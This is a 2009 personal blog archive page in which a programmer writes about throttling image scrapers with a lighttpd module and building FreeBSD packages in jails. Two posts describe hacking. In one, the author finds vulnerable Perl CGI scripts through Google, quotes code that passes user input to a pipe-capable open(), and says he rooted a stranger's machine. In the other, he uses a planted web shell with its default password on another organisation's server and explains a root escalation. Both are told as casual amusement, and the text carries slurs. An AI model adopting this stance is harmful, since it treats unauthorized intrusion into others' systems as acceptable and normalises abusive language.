The random rantings of a concerned programmer.

Archive for February, 2009

(Untitled)

February 26th, 2009 | Category: Random

lol fixed the scrapers scraping 4scrape problem (or, as much as I’m willing to).

The problem, as I see it, is that scrapers have a very abnormal usage pattern compared to normal visitors — they’re just pulling the big heavy images which cost a lot of bandwidth and CPU (in the form of I/O interrupts) to serve. My solution to the problem was to write a lighttpd module which basically throttles the number of “expensive” requests you can make. I don’t really give a shit that they’re scraping — what pisses me off is that they’re bringing the server to it’s knees by doing so.

Each IP address is associated with an integer representing the amount of resources it’s used. This value is reduced by a configurable amount each second, and increases whenever they access a marked resource. Once it gets over a maximum amount, the module starts throwing back 403 responses.

The way I’ve got it configured right now is to add 20 points for each full-size image fetched, then decay that value by 1 point/second. The maximum is 200 points before the server starts 403′ing, with a 600-point upper bound. Basically, this gives you a wallpaper every 20 seconds, allowing for bursts of activity.

I’ve also got code in place that stat‘s the requested files and bases the cost on the file size, but haven’t gotten around to testing it yet. Deploying a fucking lighttpd plugin was a goddamn nightmare (at least, compared to an Apache module) because the lighttpd developers are retards or something.

Anyway, we’ll see how this pans out. [source]

Comments are off for this post

(Untitled)

February 25th, 2009 | Category: Random

lol so we had lots of extra RAM sitting around on Rimi, so I had Shuugo up PostGRE’s work_mem from 256MB to 1024MB. Then I noticed that, hey, Rimi was like 100% loaded.

Long story short, a surprising number of people were scraping 4scrape. Not only were they scraping it, but they were doing it by assuming that the images were a simple enumeration: (1..100000).jpg, which is absolutely retarded. So I added a bunch of class C CIDR blocks to pf.conf and have a couple more tricks up my sleeve.

I think it’s absolutely retarded that someone would scrape 4scrape. Most of the shit in there is /wg/’s dirty cumstained laundry — tidus, bleach, desktop threads, 4chan.hta spam, etc. Why the fuck would anyone want to scrape all of that shit? And why do people think I’m not going to notice when AWstats shows that IP X decided to burn 5GB of bandwidth yesterday?

That’s an obvious “PLEASE BAN ME” — there aren’t 5GB of wallpapers worth viewing on 4scrape.

EDIT: lol I’m getting trolled. hard :(

1 comment

Automatic, Jailed Package Building

February 20th, 2009 | Category: Random

WordPress 2.7 can bite my fucking ass. STOP FUCKING EATING MY POSTS YOU REEKING PILE OF SHIT!

Anyway. I’ve ranted a lot about using jails as a means of isolating potentially vulnerable services from compromising one another, but there’s a lot more you can do with jails. I’m working on a system right now which provides disposable on-demand development environments: when a developer wants to do some work, they just instantiate a clean mirror of our production system, hammer away, then commit changes and throw away the environment.

One part of this system is maintaining all of the software between both the production environment and the jail instances in which the devel stuff runs — a perfect application for packages. For purposes of easy management, I just want to have a text file with a list of ports, ie

editors/vim
lang/python
www/apache22

Then have a script go through that and build all the appropriate packages which then get picked up and installed automatically when a jail is instantiated (via ezjail, of course). Once you’ve got all of the packages, you can just serve them out over HTTP (by setting PACKAGE_SITE) or dump them into an ezjail flavor.

As much as I love ezjail, it didn’t exactly make this easy. The first catch is that you can’t actually build a package within an ezjail-instantiated jail because of the games it plays with the ports system (ie, the ports makefiles want to write the package tarball to /usr/ports, which is mounted as read-only). I kind of wanted the packages to be written outside of the jail anyway, since I just want to delete the jail when everything’s finished. Just the place for some mountpoint games –

# Change ezjail's symlink to a mountable directory
rm $BUILD_JAIL_PATH/usr/ports
mkdir $BUILD_JAIL_PATH/usr/ports

mount -t nullfs $JAIL_PATH/basejail/usr/ports $BUILD_JAIL_PATH/usr/ports
mount -t unionfs $PACKAGE_DIR_PATH $BUILD_DIR_PATH/usr/ports

The other nasty bit is actually building the packages within a jail from within an unjailed script. All it should take is a couple of for loops to configure and then package everything –

for PORT in $PACKAGE_LIST ; do
    cd /usr/ports/$PORT 
    make config-recursive
done

for PORT in $PACKAGE_LIST ; do
    cd /usr/ports/$PORT 
    make BATCH=yes package-recursive clean
done

Unfortunately, the ezjail-admin console command uses execvf to spawn a jailed process rather than sh -c (which is probably the way the jail command it uses internally does it), so you have to explicitly pass it the sh -c stuff, followed by the argument.

And I couldn’t figure out how the fuck to quote the nice big chunk of code properly, so I took a slightly different route — just cat it all into a file within the jail, then execute that script directly with ezjail-admin console. It’s retarded, but it works.

[source]

6 comments

(Untitled)

February 19th, 2009 | Category: Random

I think I might have mono, lol. Been incredibly fatigued with more phlegm than normal and a soft, dry cough. I’ve more appetite than usual, but I’m attributing that to an increase in physical activity the past couple weeks.

Anyway, I was Googling around yesterday and, sure enough, found some other legacy Perl scripts which have some nice vulnerabilities:

use CGI;
$query = new CGI;
$target = $query->param('link');
$TARGETPAGE = "../$target";
open(INFILE, "$TARGETPAGE") || die "bogus file supplied: $TARGETPAGE";
while(<INFILE>){ print STDOUT $_; }
close(INFILE);

Basically, it’s the nicest thing they could have done — send an unchecked user string to Perl’s open function. open has this awesome feature called a “pipe open”, whereby if the last character is a |, the filename is passed to sh -c and the file descriptor for the new process’s stdout is bound.

Anyway I had a nice long writeup about the machine in question but fucking WordPress is a faggy piece of software and ate the goddamn post. Spoiler it’s running FreeBSD 4.7 and is actually properly set up — Apache and MySQL are running in a jail, so even after rooting the machinejail I can’t get tentacles into the kernel to properly compromise it (and I was so looking forward to stretching my legs with a nice FreeBSD kernel module in C). If only our machines at work were set up so nicely.

boring nyoro~n

Comments are off for this post

(Untitled)

February 17th, 2009 | Category: Random

If you remember back, some of our sister libraries have incompetitent system administers or something. I’ve been spending today migrating some of our legacy systems off one of their old machines (ie, scraping it lol) and while I was waiting for my scripts to go I decided to poke around the machine again.

A quick svn st in the cgi-local directory showed that someone had dropped something in there named sys.pl. Popped open the file in vi and saw that it was a CGI-Telnet instance (with the default password still set lol). So I popped open a web browser and logged in.

Now, there isn’t that much you can do with the apache user (or any other limited user), and really, I think they’ve gotten used to having the machine hacked. Breaking into the damn thing is fairly trivial — it’s got a soft and chewy outside. Today’s goal was to take a bite out of the soft and chewy center and get myself root access to really scare the shit out of their pants (especially since their production svn repo is hosted on this machine).

Unfortunately, it took me all of 20 seconds to root the box. /etc/httpd/conf/httpd.conf is owned by the apache user, which means I just had to change the User/Group directives to run as root/wheel and crash+restart Apache to get root. It was so boring I didn’t even bother try doing it. So I told my boss and had a good laugh about it, followed by a quick-spoken “our services are off that machine, right?”

Yeah, they’re off that machine.

I love caramel.

1 comment

Next Page »